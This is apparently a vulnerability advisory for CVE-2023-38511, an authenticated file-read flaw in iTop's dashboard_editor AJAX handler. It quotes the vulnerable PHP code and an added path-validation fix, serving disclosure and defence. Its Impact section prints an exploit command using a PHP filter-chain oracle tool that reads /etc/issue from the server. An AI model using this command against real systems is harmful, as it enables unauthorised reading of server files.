File read in iTop
15/04/2024
Product: iTop
Severity: Medium
Fixed Version(s): 3.0.4, 3.1.1
Affected Version(s): ≤ 3.0.3
CVE Number: CVE-2023-38511
Authors
Description
Presentation
iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.
Issue(s)
Synacktiv discovered a file read vulnerability in the iTop project due to missing validation of user-provided input. It is exploitable only by an authenticated user of the application's back office.
Timeline
Date | Description |
---|---|
2023.07.10 | Advisory sent to itop-security@combodo.com |
2023.07.19 | Vulnerabilities acknowledged |
2023.11.28 | Release of version 3.1.1 |
2024.01.17 | Release of version 3.0.4 |
2024.04.15 | Public release |
Technical details
Description
The vulnerability resides in a call to the file_get_contents() function on a user-supplied parameter without prior verification. The AJAX operation dashboard_editor allows any authenticated user of the back office to supply a file argument. This argument is then passed to the static method RuntimeDashboard::GetDashboardToEdit() in order to load a dashboard from a file, as shown in the following extract of the pages/ajax.render.php file, at line 1048:
```php
<?php
[...]
case 'dashboard_editor':
    $sId = utils::ReadParam('id', '', false, 'context_param');
    [...]
    $sDashboardFile = utils::ReadParam('file', '', false, 'string');
    $sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
    $oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
    if (!is_null($oDashboard)) {
        if (!empty($sReloadURL)) {
            $oDashboard->SetReloadURL($sReloadURL);
        }
        $oDashboard->RenderEditor($oPage, $aExtraParams);
    }
    break;
[...]
?>
```
No sufficient check is performed in this method before reading the file's content.
```php
[...]
public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
{
    $bCustomized = false;
    // Search for an eventual user defined dashboard
    $oUDSearch = new DBObjectSearch('UserDashboard');
    $oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
    $oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
    $oUDSet = new DBObjectSet($oUDSearch);
    // if id is in the database, read from it
    if ($oUDSet->Count() > 0) {
        // Assuming there is at most one couple {user, menu}!
        $oUserDashboard = $oUDSet->Fetch();
        $sDashboardDefinition = $oUserDashboard->Get('contents');
        $bCustomized = true;
    } else {
        // Else read from file
        $sDashboardDefinition = @file_get_contents($sDashboardFile);
    }
    // init dashboard from the content
    [...]
```
If the provided sDashBoardId does not exist in the database, the user-supplied file is then used directly in the file_get_contents() call.
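As an added example (not iTop's code, nor the actual fix shipped in 3.0.4 / 3.1.1), one way to guard that read is to resolve the requested name under a fixed dashboard directory and refuse anything that escapes it or names a stream wrapper. The helper name, the base directory and the `.xml` extension are assumptions.

```php
<?php
// Added example, not iTop's code: a path-validation helper that could guard the
// file_get_contents() call shown above. It assumes dashboard definitions are
// .xml files stored below a fixed base directory (assumption for this example).
function ReadDashboardFileSafely(string $sRequestedFile, string $sBaseDir): ?string
{
    // 1. Reject any stream wrapper (php://, data://, phar://, http:// ...) outright;
    //    file_get_contents() would otherwise happily open it.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $sRequestedFile)) {
        return null;
    }
    // 2. Reject NUL bytes and obvious traversal before touching the filesystem
    //    (defence in depth; step 4 is the authoritative check).
    if (strpos($sRequestedFile, "\0") !== false || strpos($sRequestedFile, '..') !== false) {
        return null;
    }
    // 3. Canonicalise both paths; realpath() returns false for non-existent files,
    //    so a missing file fails closed instead of being silenced with "@".
    $sBase = realpath($sBaseDir);
    $sReal = realpath($sBaseDir . DIRECTORY_SEPARATOR . $sRequestedFile);
    if ($sBase === false || $sReal === false) {
        return null;
    }
    // 4. The resolved path must stay inside the base directory. The separator is
    //    included so that "/opt/dashboards-other" is not accepted for "/opt/dashboards".
    if (strncmp($sReal, $sBase . DIRECTORY_SEPARATOR, strlen($sBase) + 1) !== 0) {
        return null;
    }
    // 5. Only dashboard definitions are expected here (assumed to be .xml files).
    if (pathinfo($sReal, PATHINFO_EXTENSION) !== 'xml') {
        return null;
    }
    $sContent = file_get_contents($sReal);
    return ($sContent === false) ? null : $sContent;
}

// Hypothetical use in the else-branch of GetDashboardToEdit():
//   $sDashboardDefinition = ReadDashboardFileSafely($sDashboardFile, '/path/to/itop/dashboards');
//   if ($sDashboardDefinition === null) {
//       throw new Exception('Invalid dashboard file');
//   }
```

Logging the rejected value alongside the user id gives a simple detection hook for attempts against this parameter.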
Impact
Using this vulnerability and the php_filter_chains_oracle_exploit tool, it is possible to read arbitrary files on the remote server.
```
$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l
```